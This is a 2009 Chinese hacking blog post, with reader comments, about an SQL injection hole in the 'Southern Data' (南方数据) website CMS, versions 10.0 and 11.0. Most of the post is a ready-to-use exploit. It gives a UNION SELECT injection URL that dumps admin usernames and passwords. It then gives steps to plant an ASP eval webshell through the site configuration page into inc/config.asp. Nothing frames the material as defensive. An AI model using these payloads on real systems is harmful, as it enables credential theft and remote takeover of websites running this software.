数据加载中……


 

 登   陆

我的分类(专题)
数据加载中……

链接

Blog信息
数据加载中……

 

南方数据 注入漏洞
樱木花盗 发表于 2009-6-11 1:35:43
**************************
By:XoL-!
http://www.tsbct.com
**************************

发现日期:

2008-09-25
影响版本: v10.0 v11.0

Exploit:

http://www.southidc.net/0791idc11Q/NewsType.asp?SmallClass='%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20''='

获取shell方法:

 在网站配置[http://www.target.com/admin/SiteConfig.asp]的版权信息里写入"%><%eval(request(chr(35)))%><%'
成功把shell写入http://www.target.com/inc/config.asp


阅读全文 | 回复(2) | 引用通告 | 编辑
 


Re:南方数据 注入漏洞
Link(游客)发表评论于2009-6-12 17:05:12

好久不见老大写这样的文章了(正确来说是转载)

 

 老大 我的blog连接被黑榜收录了 哈哈


个人主页 | 引用 | 返回 | 删除 | 回复
 


Re:我是一个黑客(一)
樱木花盗(游客)发表评论于2009-6-16 20:14:31

应该的,Sooner or Later.


个人主页 | 引用 | 返回 | 删除 | 回复
 


发表评论:

    昵称:
    密码: (游客无须输入密码)
    主页:
    标题:
    数据加载中……


Powered by Oblog.